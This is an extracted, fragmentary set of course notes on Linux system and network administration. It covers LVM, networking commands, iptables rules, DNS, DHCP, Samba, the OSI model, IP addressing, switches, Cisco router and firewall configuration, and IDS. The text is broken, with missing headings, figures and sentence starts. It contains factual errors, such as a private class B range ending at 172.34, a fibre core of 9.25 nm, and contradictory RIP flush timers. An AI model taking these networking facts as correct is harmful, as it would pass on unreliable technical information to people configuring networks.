The shell environment variable that contains a set of directories to be searched for UNIX commands. Files with this extension contain manual page entries. The actual extension can be any value between 1 and 9 and can have an alphabetic suffix (.3x, .7, and so on). .ag: Applixware graphics file. .as: Applixware spreadsheet file. .aw: Applixware word processing file. .bmp: Bitmap graphics file. .c: C source file. .C:C++ source file. .cc:C++ source file. .conf: Configuration file. .cxx :C++ source file. .db: Database file. .dvi: Device-independent TeX output. .gif: GIF graphics file. .gz: File compressed using the GNU gzip utility. .h: C header file. .html: HTML document. .jpg: JPEG graphics file. .m: Objective C source file. .o: Compiled object file. .p: Pascal language source file. .pbm: Portable bitmap graphics file. .pdf: Adobe Acrobat files. .ps: PostScript file .s: Assembler file. .tar: tar file. .tgz: Gzipped tar file. .tif: TIFF graphics file. 49
System & Network Administration .txt: Text document. .Z: File compressed using the compress command.
System & Network Administration As a very special treat, LVM can even make 'snapshots' of itself which enable you to make backups of a non-moving target. We return to this exciting possibility, which has lots of other real-world applications, later on. In the next section we explain the basics of LVM, and the multitude of abstractions it uses. Historically, a partition size is static. This requires a system installer to have to consider not the question of "how much data will store on this partition", but rather "how much data will *EVER* store on this partition". When a user runs out of space on a partition, they either has to re-partition (which may involve an entire operating system reload) or use kludges such as symbolic links. The notion that a partition was a sequential series of blocks on a physical disc has since evolved. Most Unix-like systems now have the ability to break up physical discs into some number of units. Storage units from multiple drives can be pooled into a "logical volume", where they can be allocated to partitions. Additionally, units can be added or removed from partitions as space requirements change. This is the basis of a Logical Volume Manager (LVM). For example, say that you have a 1GB disc and you create the "/home" partition using 600MB. Imagine that you run out of space and decide that you need 1GB in "/home". Using the old notion of partitions, you'd have to have another drive at least 1GB in size. You could then add the disc, create a new /home, and copy the existing data over. However, with an LVM setup, you could simply add a 400MB (or larger) disc, and add its storage units to the "/home" partition. Other tools allow us to resize an existing file-system, so we simply resize it to take advantage of the larger partition size and we're back in business. The physical media We should take the word 'physical' with a grain of salt, though we will initially assume it to be a simple hard disk, or a partition. Examples, /dev/hda, /dev/hda6, /dev/sda.
System & Network Administration A Logical Volume is the end result of our work, and it's there that we store our information. This is equivalent to the historic idea of partitions.
Figure 6.1
Figure 6.2
52
6.3 Filesystem
This filesystem is whatever we want it to be: the standard ext2, ReiserFS, NWFS, XFS, JFX, NTFS, etc. To the linux kernel, there is no difference between a regular partition and a Logical Volume. . A Physical Volume, containing Physical Extents: +----- [Physical Volume] ------+ | PE | PE | PE | PE | PE | PE | +------------------------------+ A Volume Group, containing 2 Physical Volumes (PVs) with 6 Physical Extents: +------ [Volume Group] -----------------+ | +--[PV] --------+ +--[PV] ---------+ | | | PE | PE | PE | | PE | PE | PE | | | +--------------+ +---------------+ | +---------------------------------------+ We now further expand this: This shows us two filesystems, spanning two disks. The /home filesystem contains 4 Physical Extents, the /var filesystem 2.
53
7. X WINDOW SYSTEM
-Provides foundation for the graphical component of Linux. -Created in 1986. -Client / Server Architecture. -XFree86 Free Open Source implementation of X. -Flexibility of the core components -Use fonts on local or remote machine. -Different graphical login- gdm, kdm, xdm KDE KDE is the k Desktop Environment. It consists of desktop environment. It uses Qt widget set. GNOME Consistent easy to use desktop environment. GNOME has collection of tools and libraries to develop software. It uses GTK+ widget set.
System & Network Administration Kwrite Default KDE text editor. -Redhat-config-xfree86 -Red hat developed X configuration tool -Monitor selection -Resolution selection -Video card selection -Xchat Full-featured IRC client -Gftp Graphical ftp client. -Gimp The GNU image Manipulation Program. -Window Manager Special X client. Perform window movement, resizing, focus.
55
8. LINUX NETWORKING
For networking firstly your hardware must be properly configured. Your network card should have been setup during the Linux installation or after the installation. Under Linux most drivers for network cards are implemented as modules, after the module is inserted, you may want to inspect the file /proc /modules to see if the module is loaded. The module configuration file is modules.conf in /etc. After setting up the network and connecting the cables, set up the network by running the command: - netconfig While setting up the network, doesnt mess up with the loop back driver which has the IP address 127.0.0.1. It is always there-it is the IP through which the computer talks to itself. IP address is allocated either statically or dynamically. For Linux Networking (communication through a network), the two basic Requirements are Media and Rules:By media we mean the communication link (cables), hubs and switches. It may be wired or wireless. Hubs are dumb, not an intelligent device. It works at the Physical layer whereas Switches are intelligent devices and works at Data link layer. To obtain good performance we make use of Switches. In a Switch, direct routing is possible, the data packet is unicasted and not broadcasted, the packet doesnt traverse to all the port but direct connection is made via IP address. Thus it has high performance; Switches maintain the IP address table for mapping process. By rules we mean the set of protocols used for communication. Rules or the Protocol to be used depends on the OS on the end systems, if both the end- Systems have MS-Windows then for small network we use Netbui protocol & for larger networks use of TCP/IP is made. End systems having LINUX as OS Make use of TCP/IP protocol.
8.1.2 Traceroute Shows network path between local and remote systems.
Useful for pinpointing network congestion. Example: traceroute www.redhat.com Lists network statistics and parameters, including Network Connection, Routing table, Interface statistics. Example: netstat rn Or netstat a 56
8.1.3 Netstat
8.1.5 Ifconfig - The ifconfig command is used to configure and display network devices.
Here is some sample output of an ifconfig command: # /sbin/ifconfig eth0 Eth0 Link encap: Ethernet HWaddr 00:50:56:40:1E:6A Inet addr: 192.168.199.131 Bcast: 192.168.199.255 Mask: 255.255.255.0 UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU: 1500 Metric: 1 RX packets: 11253 errors: 0 dropped: 0 overruns: 0 frame: 0 TX packets: 1304 errors: 0 dropped: 0 overruns: 0 carrier: 0 Collisions: 0 txqueuelen: 100 RX bytes: 2092656 (1.9 Mb) TX bytes: 161329 (157.5 Kb) Interrupt: 10 Base addresses: 0x10a0 # /sbin/ifconfig eth0 207.174.142.142 The first parameter, eth0, tells us which interface is being configured. The next Argument, 207.174.142.142, indicates the new IP address being assigned to this interface. If we want to make sure our change worked, we issue the ifconfig command again to view its current settings. # /sbin/ifconfig eth0 Eth0 Link encap: Ethernet HWaddr 00:50:56:40:1E:6A Inet addr: 207.174.142.142 Bcast: 192.168.199.255 Mask: 255.255.255.0 UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU: 1500 Metric: 1 RX packets: 11253 errors: 0 dropped: 0 overruns: 0 frame: 0 TX packets: 1304 errors: 0 dropped: 0 overruns: 0 carrier: 0 Collisions: 0 txqueuelen: 100 RX bytes: 2092656 (1.9 Mb) TX bytes: 161329 (157.5 Kb) Interrupt: 10 Base addresses: 0x10a0
57
9. LINUX AS ROUTER
For a Linux machine to be called a router it has to either have at least two network cards or it should have IP aliases set up.
CLASS A
10.0.0.2
10.0.0.3
NETWORK
Switch 1
eth0 10.0.0.1
CLASS C NETWORK
Figure 9.1
58
Dual-homed host: - proxy Filters protocols No routing between networks Not all protocols supported Can filter content High hardware requirements Work on application layer
59
System & Network Administration FORWARD, PREROUTING AND POSTROUTING).The chains represent special hooks in the netfilter code that are used for the packet filtering.
Iptables t filter A INPUT s 192.168.0.254 j DROP This deny the any packet arriving from IP address 192.168.0.254
Iptables t filter A OUTPUT d! 192.168.0.254 j DROP This denies all packets to every host except 192.168.0.254
Iptables t filter A INPUT s 192.168.0.251 I eth3 j DROP This rule denies all packets from 192.168.0.251 coming in to the eth3 interface.
Iptables t filter L INPUT This rule is used to list the rules in a particular chain.
60
11. SERVERS
11.1DNS SERVER
DNS is the Domain Name System, which maintains a database that can help your computer translate domain names such as www.redhat.com to IP addresses such as 216.148.218.197. As individual DNS servers are not large enough to keep a database for the entire Internet, they can refer requests to other DNS servers. This section addresses two basic DNS server configurations: a caching-only server, and a primary DNS server for a domain. The key configuration files to support such servers include /etc/nsswitch.conf, /etc/resolv.conf, and /etc/hosts,/etc/named.conf,/var/named/.
61
.edu
.gov
.com
.org level
Domain
Top
india.gov
The DNS root has a small set of top-level domains that rarely changes. Some of them are as aero, com, net, edu, gov, info, org, int, and name. In a domain name like www.poornima.org, org is a first-level name within the root, poornima is a second-level name within org, and www is a third-level name within poornima. The tree can extend to any number of levels, but in generally it is not more then four levels deep.
System & Network Administration addresses are either dynamically assigned from a range or pool of address, or statically assigned by MAC address. Service Profile: DHCP Type: System V-launched scripts Packages: dhcp Daemons: dhcpd Scripts: dhcpd Ports: 67(bootps), 68(bootps) Configuration: /etc/dhcpd.conf Related: dhclient
192.168.0.1
DHCP SERVER
SWITCH
PC 1 192.168.0.18
PC 3 192.168.0.20
63
System & Network Administration supported NFS (both as a client and a server) for years, and NFS continues to be popular in organizations with UNIX- or Linux-based networks.
/etc/rc.d/init.d/nfs (start/stop script for NFS) /etc/rc.d/init.d/nfslock (start/stop script for lockd and statd) /usr/share/doc/nfs-utils-version (documentation, mostly in HTML format) Server daemons in /usr/sbin: rpc.mountd, rpc.nfsd Server daemons in /sbin: rpc.lockd, rpc.statd Control programs in /usr/sbin: exportfs, nfsstat, nhfsstone, showmount Status files in /var/lib/nfs: etab, rmtab, statd/state, xtab
The portmap package includes the following key files: /etc/rc.d/init.d/portmap (start/stop script) /usr/share/doc/portmap-version (documentation) Server daemon in /sbin: portmap Control programs in /usr/sbin: pmap_dump, pmap_set
65
SWITCH
66
You can do four basic things with Samba: - Share a Linux directory tree with Windows computers. - Share a Windows directory with Linux computers. - Share a Linux printer with Windows computers. - Share a Windows printer with Linux computers.
It is easy to configure Samba to do a number of things on a Microsoft- based network Participate in a Microsoft Windows 9xstyle Workgroup or an NT/2000/XP Domain as A client or a server. Act as a Primary or Backup Domain Controller. Share user home directories. Act as a WINS client or server. Link to or manage a workgroup browse service. Act as a Master Browser. Provide user/password and share security databases locally, from another Samba server, or from a Microsoft Domain Controller. 67
System & Network Administration Configure local directories as shared SMB file systems Synchronize passwords between Windows and Linux systems. Download print drivers to Microsoft clients.
11.6.1 These are the four Samba RPM packages that you need:
-The Samba package includes the basic SMB server software for sharing files and printers. -The Samba-common package contains common Samba configuration files. -The Samba-client package provides the utilities needed to connect to shares from Microsoft computers. - The Samba-swat package includes the aforementioned SWAT configuration tool.
PRINTER
68
SWITCH
LINUX
Hardware Requirement For Red Hat Linux Network Installation Pentium base Server with 64 MB RAM Hard disc drive of minimum 4.3 GB Ethernet Card (NIC) 10/100 MBPS Ethernet Hub 10/100 MBPS 12 Port UTP CAT 5e Cable RJ-45 Connector Software & Operating System Client Operating System Network Installation & Implementation Red Hat Linux Enterprise Server installation and Configuration (LAN/WAN) Table 11.1 10 Nos 01 Nos 500 Meter (Approx) 30 Nos Red Hat Linux Enterprise Server As much
69
12.3.2 High reliability- As all files could be replicated on two or three machines, so if one
of them is unavailable (due to hardware failure), the other copies could be used.
12.3.3 Scalability- It is the ability to increase system performance gradually as the workload
grows just by adding more processors. 70
System & Network Administration A computer network can provide a powerful communication medium along widely separated employees. The use of networks to enhance human-to-human communication will probably prove more important than technical goals such as improved reliability. These are the requirement with respect to companies but computer networking is required even in the normal day to day life as we have to access the internet to get information about what all new happening in the world, to have communication with people staying far away using the e mail service. These are the reasons that forced the inventerors to invent the networking devices, models and protocols etc. And the birth of Networking took place in 1844 when for the first time Samuel Morse send the first telegraph message.
71
Table 12.1
72
Table 12.2 WANs run at speed of maximum 2 to 10 Mbps. For most WANs, the long distance bandwidth is relatively slow: on the order of kilobits per second (kbps) as opposed to megabits per second (Mbps) for local-area networks (LANs). For example, an Ethernet LAN has a 10 Mbps bandwidth; a WAN using part or all of a T1 carrier has a bandwidth of 1.544 Mbps .
System & Network Administration interfaces between these layers. The layers break a large, complex set of concepts and protocols into smaller pieces, making it easier to talk about, to implement with hardware and software, and to troubleshoot.
12.6.1 The following list summarizes the benefits of layered protocol Specifications:
-Humans can more easily discuss and learn about the many details of a protocol specification. -Standardized interfaces among layers facilitate modular engineering. -A better environment for interoperability is created. One vendor can write software that implements higher layersfor example, a Web browserand another can write software that implements the lower layersfor example, Microsofts built-in TCP/IP software in its operating systems. -Reduced complexity allows easier program changes and faster productevolution. -One layer uses the services of the layer immediately below it. Therefore, remembering what each layer does is easier. (For example, the network layer needs to deliver data from end to end. To do this, it uses data links to forward data to the next successive device along that endto-end path.)
Figure 12.3 74
75
System & Network Administration -Provides acknowledgment of successful transmissions; requests retransmission if some packets dont arrive error-free -Provides flow control and error-handling TCP, ARP, RARP; 12.7.1.5 NETWORK LAYER -Translates logical network address and names to their physical address (e.g. computer name ==> MAC address) -Responsible for addressing and determining routes for sending -Managing network problems such as packet switching, data congestion and routing -If router cant send data frame as large as the source computer sends, the network layer compensates by breaking the data into smaller units. At the receiving end, the network layer reassembles the data -Think of this layer stamping the addresses on each train car IP; ARP; RARP, ICMP; RIP; OSFP; 12.7.1.6 DATA LINK LAYER -Turns packets into raw bits 100101 and at the receiving end turns bits into packets. -Handles data frames between the Network and Physical layers -The receiving end packages raw data from the Physical layer into data frames for delivery to the Network layer -Responsible for error-free transfer of frames to other computer via the Physical Layer -This layer defines the methods used to transmit and receive data on the network. It consists of the wiring, the devices use to connect the NIC to the wiring, the signaling involved to transmit / receive data and the ability to detect signaling errors on the network media 12.7.1.7 Logical Link Control -Error correction and flow control -Manages link control and defines SAPs 12.7.1.8 PHYSICAL LAYER -Transmits raw bit stream over physical cable -Defines cables, cards, and physical aspects -Defines NIC attachments to hardware, how cable is attached to NIC -Defines techniques to transfer bit stream to cable
76
13. IP ADDRESSING
Every machine on the internet has a unique identifying number, called an IP Address. A typical; IP address looks like this: 216.27.61.45 IP ADDRESS is a 32-bit number, usually written in dotted decimal form, that uniquely identifies an interface of some computer. This 32-bit number is divided into 4 octets each separated by a decimal. Out so many values certain values are restricted for use as typical IP address. For example, the IP address 0.0.0.0 is reserved for the default network and the address 255.255.255.255is used for broadcast. Each IP address is split into 2 sections: 1) Network address 2) Host address Individual IP address in same network all have a different value in the host part of address, but they have identical value in network part, just as in town there are different street address but same ZIP code.
13.1.1.1 Loopback- The IP address 127.0.0.1 is used as the loopback address. This means that it is used by the host computer to send a message back to itself. It is commonly used for troubleshooting and network testing.
13.1.2 Class B- Class B is used for medium-sized networks. A good example is a large
college campus. IP addresses with a first octet from 128 to191 are part of this class. Class B addresses also include the second octet as part of the Net identifier. The other two octets are used to identify each host. Net 145. Host or Node 24 53.198
13.1.3 Class C- Class C addresses are commonly used for small to mid-size business. IP
addresses with a first octet from192 to 223 are part of this class. Class C addresses also include the second and third octets as part of Net identifier. The last octet is used to identify each host. 77
13.1.4 Class D- It is used for multicast. It has first bit value of 1, second bit value of 1, third
bit value of 1 and fourth bit value of 0. The other 28 bits are used to identify the group of computers the multicast messages is intended for. Net 224. Host or Node 24.54.145
13.2 Private IP
It is not necessary that every time we make a network we are connected to some ISP (Internet Service Provider). So in that case we require some private IP also which can be used in indigenous networks .In each class a range of IP addresses have been defined for this purpose CLASS A 10.0.0.1 to 10.255.255.244 CLASS B 172.16.0.1 to 172.34.255.254 CLASS C 192.168.0.0/16
13.3 MASKING
Computers use a mask to define size of network and host part of an address. Mask is a 32-bit number written in dotted decimal form. It provides us the network address when we perform a Boolean AND of mask with the IP address. It also defines number of host bits in an address.
13. 4 SUBNETTING
Basically it is a process of subdividing networks into smaller subnets. In case we have 2-3 small networks but we cant buy IP address for each and every network. So here we use the basic concept of SUBNETTING i.e. using one public IP address we will give them IP address and make them independent networks. For this we take some bits of host address and use them for network address so we have different independent networks Address Format when Subnetting Is Used (class A,B,C resp.): And due to this mask changes to subnet mask and now the network address also includes subnet address. 78
13.5.2 Broadcast Domain- It is the group of PCs those will receive same broadcast
message. CSMA/CD (Carrier Sense Multiple Access/ Collision Detection)- In this protocol when a PC wants to transmit any packet it sense the carrier i.e. the path ,if no other PC is using the carrier then only it sends. If two PCs start sending data simultaneously collision will occur. Both PCs will wait for some random time and then initiate the same process.
13.5.3 MAC (Media Access Control) . The IEEE 802.3 (Ethernet) and 802.5 (Token Ring)
are the MAC sub layers of these two LAN data link protocols.
13.5.4 Burned-in address: The 6-byte address assigned by the vendor making the card. It is
usually burned in to a ROM or EEPROM on the LAN card and begins with a 3-byte organizationally unique identifier (OUI) assigned by the IEEE. Locally administered address: Through configuration, an address that is used instead of the burned-in address.
13.5.5 Unicast address: Fancy term for a MAC that represents a single LAN interface.
13.7 CABLES
There are different Cabling options depending on the access method :
System & Network Administration Typical lengths are up to 100m. Twisted pair network uses a star topology.
13.7.2 Coaxial
80
System & Network Administration Coaxial cable uses BNC connectors. The maximum cable lengths are around 500m. Coaxial networks use a single bus topology.
System & Network Administration possible to send the data about 10 kilometers. Fiber optic cable uses SC, ST, LC connectors (most common in use is SC connector) In fiber cables the data is converted to light signals and the signal is made to propagate through the fiber cable. There are two types of Fibre optic cable available. 1. Single mode: In this mode typical length is up to 12km and data rate is 1000Mbps. The core diameter is about 9.25 nm cable is known as 1000 base LX cable. 2. Multi mode: This mode is further categorised in two: SX: Typical length is up to 500m and data rate is 1000Mbps. FX: Typical length is up to 220m and data rate is 100Mbps.
82
83
Figure 13.4 - The port where we are connecting the RJ-45 is a network card, attach the other end of the cable segment to a modular wall outlet that is connected to the wiring closet . Otherwise, attach the other end to an available port on the switch. Make sure each twisted pair cable does not exceed 100 meters (328 ft) in length.
System & Network Administration depending on the make of the NIC. A physical transmission medium, such as twisted pair or coaxial cable interconnects all network interface cards to network hubs or switches. Ethernet and Token Ring are common network interface cards. Todays cards supports 10baseT and 100baseT with automatic recognition.
13.11.1 HUB
When the need for interconnecting more then 2 devices together then a device known as hub comes to picture. Basically hub is a layer one device. i.e. it operates on the physical layer of the OSI model. It is designed to do broadcasting i.e when it gets any frame it broadcasts it to every port irrespective that whether it is destined for that port or not. Hub has no way of distinguishing which port a frame should be sent. Broadcasting results in lot of traffic on the network which leads to poor network response. If two PC simultaneously transmit there data packets and both are connected to a HUB, then collision will occur, so we can say, it creates a single collision domain. On the other hand all PCs connected to a hub will get a same message so a single broadcast domain will be created. A 100/1000 Mbps hub must share its bandwidth with each and every one of its ports. So when only one PC is broadcasting, it will have access to the max available bandwidth. If, however, multiple PCs are broadcasting, then that bandwidth will need to be divided between all of these systems, which will degrade the performance. They are usually halfDuplex in nature.
13.11.2 SWITCH
Hubs are capable of joining more than two PC but having some demerits like if two PC would want to communicate at a time then there would be a collision and the both PC would have to send the data once again. This shortcoming of Hub is overcame by Switches. Switches are intelligent devices which work on the Layer2 of the OSI model. Basically a switch keeps a record of MAC addresses of all the devices connected to it. Using this information, it builds a MAC address table. So when a frame is received, it knows exactly which port to send it to, which increases the network response time. 13.11.2.1 Basic Working Principle of Switch. -At the time of initializing the switch the MAC address table is yet to be built up. When a frame is send by some of the PC, it recognises the source MAC address and updates the MAC address table. - If the destination is available in the MAC table then forward to the corresponding PC. - If the destination MAC address is not present in the table then forwards in all the port available expect the incoming one. The designated PC will respond for the data and it will send the acknowledge for the data received. This acknowledged data will be examined by the switch and the MAC address table would be up dated accordingly. If two PC simultaneously transmit there data packets and both are connected to a SWITCH, then collision will not occur, so we can say, it creates a multiple collision domain. 85
System & Network Administration The switch supports broadcast. Hence we can call switches create single broadcast domain and multiple collision domains. A 100/1000Mbps switch will allocate a full 100/1000 Mbps to each of its ports. So regardless of the no of PCs transmitting user will always have access to max amount of bandwidth. They are usually Full-Duplex in nature. 13.11.2.2 Switches are of two types -Managed - Unmanaged 13.11.2.3 Managed switch supports SNMP (Simple Network Management Protocol) Different switching Principles:-Store-and-forward:- The switch fully receives all bits in the frame (store) before forwarding the frame (forward). This allows the switch to check the FCS before forwarding the frame. (FCS is in the Ethernet trailer.) -Cut-through:- The switch performs the address table lookup as soon as the destination address field in the header is received. The first bits in the frame can be sent out the outbound port before the final bits in the incoming frame are received. This does not allow the switch to discard frames that fail the FCS check. (FCS is in the Ethernet trailer.) -Fragment Free:- This performs like cut-through switching, but the switch waits for 64 bytes to be received before forwarding the first bytes of the outgoing frame. According to Ethernet specifications, collisions should be detected during the first 64 bytes of the frame; frames in error because of a collision will not be forwarded. The FCS still cannot be checked. Bridge is another device like switch which also operates basing on the MAC address. But the Basic difference between the bridge and the switch is that bridge works on software bases, but the switch works on hardware basic. The Switch works on ASICs ( Application Specific Integrated Circuits)
13.11.3 ROUTER
Switch and the Hub can only interconnect devices in a single LAN. For interconnecting two LAN or two or more different networks anther device known as router is used. Its main job is to route ( sends ) packets to other networks and to do the routing ( establishing paths between networks ) it uses the IP address. A router is typically connected to at least two networks, commonly two LANs or WANs or a LAN and its ISPs network. Routers are located at gateways, the places where two or more networks connect. Routers to determine the best path for forwarding the packet are using forwarding tables. It is a layer 3 device i.e it operates at network layer of OSI model. The working principle of the router is totally different from a switch. Router makes a table known as routing table, which contains all the IP address in the network, the information for IP address router obtains directly ( all configured IP address on it ) or indirectly ( from neighbor routers ). When a packet is received it compares the destination IP address of the packet with 86
System & Network Administration the available IP addresses in its Routing table. If the IP address is not available in the routing table then it simply discard the packet instead of flooding in all the ports like a switch.(Detailed Information about router in chap )
Table 13.1
87
14. ROUTER
14.1.1 ROM- It is used to store the routers bootstrap startup program, operating system
software, and power-on diagnostic tests programs. We can also upgrade our ROM
14.1.2 FLASH MEMORY- It holds operating systems image(s). Flash memory is erasable,
reprogrammable ROM. Our IOS software is present in this memory and we can upgrade it also. Flash content is retained even when we switch off or restart the router.
14.1.3 RAM- It is used to store operational information such as routing tables, routers
running configuration file. RAM also provides caching and packet buffering capabilities. Its content is lost when we switch off or restart the router. When we configure the router at that time actually we are writing in RAM.
14.1.4 NVRAM- It is used to store the routers startup configuration file. It does not lose
data when power is switched off. So the contents of startup configuration files are maintained even when we switch off or restart the router.
88
Figure 14.1
System & Network Administration N1 On/off After pressing enter or OK to accept these settings, we came across a blank window. This is a session window. The Following steps are adopted to access a router through the console port with a Windows based PC. Access Hyper terminal:- Start Menu Programs Accessories
90
Figure14.3
Figure 14.4 After connecting the router that will boot and after booting the following procedures will be adopted. Router> enable Now automatically prompt asking for password will appear on the screen like this: 91
System & Network Administration Password: Now write password over here. This is done to secure access to router. After this Router# will appear on the screen this shows that we are in privileged mode and now we try to enter in configuration mode. Router# configure terminal This is done to enter configuration mode. Now starts the configuration of router Now we will assign IP address to each and very interface connected to router. Subnet mask should be given with a proper care. Following steps are to be followed: For configuring Ethernet interface: Router# config terminal Router (config)# interface ethernet 0 Router (config-if)# ip address 223.8.151.1 255.255.255.0 Router (config-if)# no shutdown Router (config-if)#exit For configuring serial interface: Router (config)# interface serial 0 Router (config-if)# ip address 204.204.7.1 255.255.255.0 Router (config-if)# no shutdown Router (config-if)#exit Router (config)# interface serial 1 Router (config-if)# ip address 199.6.13.2 255.255.255.0 Router (config-if)# no shutdown Router(config-if)# exit
System & Network Administration the default). This means that a RIP router summarizes all routes it knows along classful boundaries and sends the summary information to all other RIP routing devices. RIP updates can contain up to 25 messages. 14.4.1.1 RIP TIMERS TIMER DEFAULT CONTROLS -update 30 sec. Interval between route update advertisements -timeout 180 sec. Interval a route should stay 'live' in the routing table. This counter is reset every time the router hears an update for this route. -Flush 240 sec. How long to wait from the time the route was received to delete a route (60 seconds after timeout). The routing-update timer controls the time between routing updates. Default is usually 30 seconds, plus a small random delay to prevent all RIP routers from sending updates simultaneously. The route-timeout timer controls when a route is no longer available. The default is usually 180 seconds. If a router has not seen the route in an update during this specified interval, it is dropped from the router's announcements. The route is maintained long enough for the router to advertise the route as down (hop count of 16). The route-flush timer controls how long before a route is completely flushed from the routing table. The default setting is usually 120 seconds. 14.4.1.2 BASIC RIP CONFIGURATION According to the recollection of InetDaemon, configuring a Cisco router for a basic RIP configuration would look something like this: router> enable Password: router# conf -t router(config)#interface ethernet 0 router(config-if)# ip address 192.168.42.1 router(config-if)# interface ethernet 1 router(config-if)# ip address 192.168.43.1 router(config-if)# exit router(config)# router rip router(config-router)# network 192.168.42.0 router(config-router)# network 192.168.43.0 router(config-router)# exit router(config-router)# ^z 93
System & Network Administration router# The example above assumes that the interfaces that will be running RIP have IP addresses on them that fall within the 192.168.42.0, and 192.168.43.0 class C ranges.
14.4.2 IGRP
IGRP is a distance-vector routing protocol that considers a composite metric which, by default, uses bandwidth and delay as parameters instead of hop count. IGRP is not limited to the 15-hop limit of RIP. IGRP has a maximum hop limit of 100, by default, and can be configured to support a network diameter of 255. With IGRP, routers usually select paths with a larger minimum-link bandwidth over paths with a smaller hop count. Links do not have a hop count. They are exactly one hop. IGRP is available only on Cisco routers IGRP will load-balance traffic if there are several paths with equal cost to the destination IGRP sends its routing table to its neighbors every 90 seconds. IGRP's default update period of 90 seconds is a benefit compared to RIP, which can consume excessive bandwidth when sending updates every 30 seconds. IGRP uses an invalid timer to mark a route as invalid after 270 seconds (three times the update timer). As with RIP, IGRP uses a flush timer to remove a route from the routing table; the default flush timer is set to 630 seconds (seven times the update period and more than 10 minutes). If a network goes down or the metric for the network increases, the route is placed in hold down. The router accepts no new changes for the route until the hold down timer expires. This setup prevents routing loops in the network. The default hold down timer is 280 seconds (three times the update timer plus 10 seconds).
System & Network Administration Access lists have two major steps in their logic: matching and action. Matching logic examines each packet and determines whether it matches the access-list statement. As soon as an access-list statement is matched, there are two actions to choose from: deny and permit. Deny means to discard the packet, and permit implies that the packet should continue on its way.
14.5 FIREWALL
As the limits of networking is increasing unfolded so the danger of information leaking in and leaking out increases. So a mechanism is required to keep good bits in and bad bits out. And for this we use FIREWALL. A firewall is a device of some kind that separates and protects our network in most cases, from the Internet. It restricts traffic to only what is acceptable, and monitors that what is happening. Every firewall has at least two network interfaces, one for the network it is intended to protect, and one for the network it is exposed to. A firewall sits at the junction point or gateway between the two networks, usually a private network and a public network such as the Internet. It may be a hardware device or a software program running on a secure host computer. Hardware device means a physical devise connected at the gateway which checks every incoming or outgoing packet. Software program means that software is loaded in computer that determines as what to allow and what to reject. A firewall examines all traffic routed between the two networks to see if it meets certain criteria. A firewall filters both inbound and outbound traffic. Technologies
System & Network Administration When a firewall is installed then no PC makes direct connection to the outside world. In that case they use proxy i.e each PC first of all sends request to proxy which then forwards the request to the internet or outside world for connection or data transfer. Stateful Inspection It is a combination of Packet filtering and proxy services. This is the most secure technology and provides the most functionality because connections are not only applied to ACL, but are logged into a static table. After a connection is established, all session data is compared to the static table. If the session data does not match the state table information for that connection, then connection is dropped.
14.5.3.1 Interface Command The interface command identifies the interface hardware card, sets the speed of the interface and enables the interface all in one command. SYNTAX: interface hardware_id hardware_speed [shutdown] hardware_id indicates interfaces physical location on the firewall. Hardware_speed indicates connection speed. There are various options provided to us by the firewall regarding speed. 1000sxfullSets full-duplex Gigabit Ethernet. 1000basesxSets half-duplex Gigabit Ethernet 1000autoAutomatically detects ands negotiates full/half duplex 10fullSets 10Mbps full-duplex Ethernet 100fullSets 100Mbps full-duplex Ethernet. Shutdown This parameter administratively shuts down the interface. nameif command It is used to name an interface and assign security level from 1 to 99. The outside and inside interfaces are named by default and have default security values of 0 and 100, respectively. By default, the interfaces have their hardware 96
System & Network Administration ID. Ethernet 0 is the outside interface, and Ethernet 1 is the inside interface SYNTAX: nameif hardware_id if_name security_level hardware_id Indicates the interfaces physical location on the Firewall. if_name The name by which we refer to this interface. security_level A numerical value from 1 to 99 indicating the security level. Examples: nameif ethernet0 outside security0 nameif ethernet1 inside security100 nameif ethernet2 dmz security20 We can see the configuration by using show nameif command. ip address Command All the interfaces must be configured with an IP address. The ip address command is used to configure IP addresses on the interfaces. The ip address command binds a logical address (IP address) to the hardware ID. SYNTAX: ip address if_name ip_address [netmask] if_name The interface name that was configured using the nameif command. ip_address The interfaces IP address. netmask The appropriate network mask. If the mask value is not entered, the firewall assigns a classful network mask. Example: ip address inside 10.10.10.14 255.255.255.0 We can see the configuration by using show ip command. nat Command The nat (Network Address Translation) command translates a set of IP addresses to another set of IP addresses. SYNTAX: nat ( if_name) nat_id local_ip [netmask] (if_name) The internal network interface name. nat_id The ID number to match with the global address pool. local_ip The IP address that is translated. This is usually the inside network IP address. netmask Network mask for the local IP address. There are two types of NATing: -Static: For ex. There is a google server and we dont want to make its IP address public so we change its IP address using nat command in firewall and now user will logon to this new IP . This results in more security as every time it has to pass through firewall.
97
System & Network Administration - Dynamic: If there are lots of PCs in a network and all want to access the internet , it is not easy that every PC is being provided with independent public IP so at firewall level we change every PCs pvt Ip with public IP. Examples: nat (inside) 1 10.10.10.0 255.255.255.0 nat (inside) 1 172.16.1.0 255.255.255.0 global Command The global command is used to define the address or range of addresses that the addresses defined by the nat command are translated into. It is important that the nat_id be identical to the nat_id used in the nat command. The nat_id pairs the IP address defined by the global and nat commands so that network translation can take place. SYNTAX: global ( if_name) nat_id global_ip | global_ip-global_ip [netmask] (if_name) The external network where you use these global addresses. nat_id Identifies the global address and matches it with the nat command it is pairing with. global_ip A single IP address. When a single IP address is specified, the firewall automatically performs Port Address Translation (PAT). global_ip-global_ip Defines a range of global IP addresses to be used by the firewall to NAT. netmask The network mask for the global IP address(es).
14.6.1 HIDS
Host Intrusion Detection Systems run on individual hosts or devices on the network. A HIDS monitors the inbound and outbound packets from the deviceonly and will alert the user or administrator of suspicious activity if detected.
14.6.2 NIDS
98
System & Network Administration Network Intrusion Detection Systems are placed at a strategic point or points within the network to monitor traffic to and from all devices on the network. Ideally you would scan all inbound and outbound traffic, however doing so might create a bottleneck that would impair the overall speed of the network. When an unauthorized user logs in successfully, or attempts to log in, they are best tracked with host-based IDS. However, detecting the unauthorized user before their log on attempt is best accomplished with network-based IDS. 14.6.2.1 There are four basic techniques used to detect intruders: -Anomaly detection - misuse detection (signature detection) - target monitoring
99
System & Network Administration A passive IDS simply detects and alerts. When suspicious or malicious traffic is detected an alert is generated and sent to the administrator or user and it is up to them to take action to block the activity or respond in some way.
System & Network Administration IEEE developed the 802.11 standards to provide wireless networking technology like the wired Ethernet.
15.1 STANDARDS
IEEE developed the 802.11 standards to provide wireless networking technology. With timeto-time development in the field of technology three standards has been finalized. 802.11(a), 802.11(b), 802.11(g)
Table 15.1
15.2 TOPOLOGIES
There are two topologies on which WLAN works: -Infrastructure Network - Ad hoc Network
101
Figure 15.1
Figure 15.2
